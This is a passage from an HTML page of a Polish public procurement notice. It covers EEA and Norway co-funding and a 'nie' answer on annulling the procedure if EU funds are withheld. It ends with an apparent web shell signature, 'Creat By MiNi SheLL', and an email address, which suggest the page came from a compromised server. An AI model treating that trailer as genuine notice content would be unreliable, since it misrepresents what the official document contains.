systemu zakupów. Zamawiający nie zamierza zawierać umowy ramowej. Projekt 
współfinansowany z funduszy EOG, pochodzących z Islandii, Lichtensteinu i 
Norwegii oraz środków krajowych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com